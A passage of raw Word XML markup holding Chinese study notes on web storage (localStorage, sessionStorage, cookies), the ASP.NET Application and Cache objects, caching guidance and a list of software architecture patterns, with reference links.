          <w:shd w:val="clear" w:color="auto" w:fill="FDFCF8"/>
        </w:rPr>
        <w:t>- 针对一个 session 的数据存储</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>之前，这些都是由 cookie 完成的。但是 cookie 不适合大量数据的存储，因为它们由每个对服务器的请求来传递，这使得 cookie 速度很慢而且效率也不高。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>要访问同一个LocalStorage，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>页面必须来自同一个域名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(子域名无效)，使用同一种协议，在同一个端口上。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在 HTML5 中，数据不是由每个服务器请求传递的，而是只有在请求时使用数据。它使在不影响网站性能的情况下存储大量数据成为可能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>限制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对于localStorage而言，大多数浏览器会有5MB的限制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SessionStorage有的浏览器没有限制，有的有2.5MB和5MB的限制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>参考网址：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.w3school.com.cn/html5/html_5_webstorage.asp" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>http://www.w3school.com.cn/html5/html_5_webstorage.asp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Application</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Application相当于应用程序的“全局变量”，如图所示：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>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25" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5095240" cy="2761615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="726" w:hanging="363"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="726" w:hanging="363"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如果要使用Application要注意的是所有的写操作都要在Application_OnStart事件中完成（global.Asax），</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>尽管可以使用Application.Lock()避免了冲突，但是它串行化了对Application的请求，会产生严重的性能瓶颈</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="726" w:hanging="363"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>参考网址：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="726" w:hanging="363"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://blog.csdn.net/lxlj2006/article/details/5608281" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>https://blog.csdn.net/lxlj2006/article/details/5608281</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="726" w:hanging="363"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.cnblogs.com/Arlar/p/5934651.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>https://www.cnblogs.com/Arlar/p/5934651.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="726" w:hanging="363"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Cache</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="454" w:hanging="363"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>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pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="454" w:hanging="363"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="4F4F4F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在可以的条件，尽量用 HttpRuntime.Cache ，而不是HttpContext.Cache</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="454" w:hanging="363"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="454" w:hanging="363"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>合理的使用缓存</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>读写小于10:1的情况下，不适合用缓存，我们用缓存的目的就是想分摊下数据库的压力以及利用内存来提速性能，如果读写差不多，或者压根就没读过，这样的死数据就会造成内存资源的浪费。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体"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pPr>
        <w:pStyle w:val="29"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:after="125"/>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>大公司在缓存方面做的好的地方就是在一个“控”字上，他们会为缓存专门做一套“缓存系统”，当系统预加载的时候，同时也充当内存数据库使用，将这些元数据加载到缓存系统中，比如“县市区”，“分类信息”等等作为预热数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="454" w:hanging="363"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>局部缓存</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:after="125"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>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软件架构</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ASP.NET MVC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MVP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>事件模型</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:tabs>
